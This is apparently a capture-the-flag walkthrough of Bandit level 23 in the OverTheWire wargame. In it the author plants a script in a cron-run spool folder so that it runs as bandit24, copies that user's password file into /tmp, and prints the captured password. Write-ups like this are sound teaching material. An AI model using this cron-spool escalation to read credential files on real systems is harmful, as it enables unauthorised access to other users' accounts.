Level 23¶
Connect to the server as bandit23 with the password.
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in
/etc/cron.d/for the configuration and see what command is being executed.
Another cron job. Oh boy.
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24 @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in * .*; do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" timeout -s 9 60 ./$i rm -f ./$i fi done
So here we have a little bash script that executes and deletes scripts in the folder /var/spool/bandit24. Let's take a look at this folder.
bandit23@bandit:~$ ls -lah /var/spool/bandit24/ total 1.4M drwxrwx--- 2 bandit24 bandit23 1.3M Oct 7 13:50 . drwxr-xr-x 5 root root 4.0K Oct 16 2018 ..
There is something funky going on here – why does the folder have a reported size of 1.3 megabytes despite being empty?
But in any case, it should be possible for me
bandit23@bandit:~$ mkdir /tmp/20983r7ufiwhjcn30 bandit23@bandit:~$ cd /tmp/20983r7ufiwhjcn30 bandit23@bandit:/tmp/20983r7ufiwhjcn30$ cat > 32hjbkj2bj32jhb2.sh #!/bin/bash cat /etc/bandit_pass/bandit24 > /tmp/20983r7ufiwhjcn30/out/pass bandit23@bandit:/tmp/20983r7ufiwhjcn30$ mkdir out bandit23@bandit:/tmp/20983r7ufiwhjcn30$ chmod a+w out bandit23@bandit:/tmp/20983r7ufiwhjcn30$ chmod a+x 32hjbkj2bj32jhb2.sh bandit23@bandit:/tmp/20983r7ufiwhjcn30$ cp 32hjbkj2bj32jhb2.sh /var/spool/bandit24
I had to wait a little bit, but eventually, it was executed.
bandit23@bandit:/tmp/20983r7ufiwhjcn30$ ls out pass bandit23@bandit:/tmp/20983r7ufiwhjcn30$ cat out/pass UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ